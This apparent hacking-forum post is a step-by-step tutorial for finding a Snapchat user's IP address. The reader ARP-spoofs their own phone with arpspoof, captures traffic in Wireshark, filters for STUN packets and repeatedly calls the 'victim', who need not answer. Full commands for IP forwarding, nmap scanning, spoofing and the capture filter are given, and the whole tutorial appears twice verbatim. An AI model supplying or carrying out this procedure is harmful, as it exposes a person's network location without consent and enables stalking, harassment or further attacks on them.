I did not see anything related to Snapchat MITM in this forum so I decided to make one. If this already exists, please excuse and ignore me.
Here is some things you will need in order to make this work:
Requirements: - Mac OS X / Kali linux ( or any UNIX )
- A phone where you have snapchat on ( Im assuming its a phone )
- Nmap
- Some tools and little MITM knowledge !
Here is the tutorial:
Download Wireshark Here -> https://www.wireshark.org
Download arpspoof Here -> https://github.com/ivanvza/arpy - MACOS only* - Kali linux has this already!
1. Fire up terminal and ip forward your laptop/pc with this scripts:
Kali - "" sudo sysctl net.ipv4.ip_forward = 1 ""
"" sudo net.ipv4.ip_forward = 1 ""
Mac - "" sudo sysctl -w net.inet.ip.forwarding=1 ""
2. Find your phone device local ip and write it down.
nmap -sn <gateway ip>/24 ex. nmap -sn (or -sP) 192.168.0.1/24
3. Spoof your phone.
arpspoof -i <interface> -t <phone ip> gateway
ex: arpspoof -i en0 -t 192.168.0.160 192.168.0.1
Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:
arpspoof -i en0 -t 192.168.0.1 192.168.0.160
4. Fire up Wireshark and filter on your phone ip with STUN protocol
ip.addr == <phone ip> && stun
ex. ip.addr == 192.168.0.160 && stun
5. Call your victim on snap and keep calling him for around 5 seconds.
THEY DO NOT NECESSARY NEED TO ANSWER
You will see on wireshark some binding requests, then some other STUN ones.
Those last ones are your victim's ip.
Here is some things you will need in order to make this work:
Requirements: - Mac OS X / Kali linux ( or any UNIX )
- A phone where you have snapchat on ( Im assuming its a phone )
- Nmap
- Some tools and little MITM knowledge !
Here is the tutorial:
Download Wireshark Here -> https://www.wireshark.org
Download arpspoof Here -> https://github.com/ivanvza/arpy - MACOS only* - Kali linux has this already!
1. Fire up terminal and ip forward your laptop/pc with this scripts:
Kali - "" sudo sysctl net.ipv4.ip_forward = 1 ""
"" sudo net.ipv4.ip_forward = 1 ""
Mac - "" sudo sysctl -w net.inet.ip.forwarding=1 ""
2. Find your phone device local ip and write it down.
nmap -sn <gateway ip>/24 ex. nmap -sn (or -sP) 192.168.0.1/24
3. Spoof your phone.
arpspoof -i <interface> -t <phone ip> gateway
ex: arpspoof -i en0 -t 192.168.0.160 192.168.0.1
Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:
arpspoof -i en0 -t 192.168.0.1 192.168.0.160
4. Fire up Wireshark and filter on your phone ip with STUN protocol
ip.addr == <phone ip> && stun
ex. ip.addr == 192.168.0.160 && stun
5. Call your victim on snap and keep calling him for around 5 seconds.
THEY DO NOT NECESSARY NEED TO ANSWER
You will see on wireshark some binding requests, then some other STUN ones.
Those last ones are your victim's ip.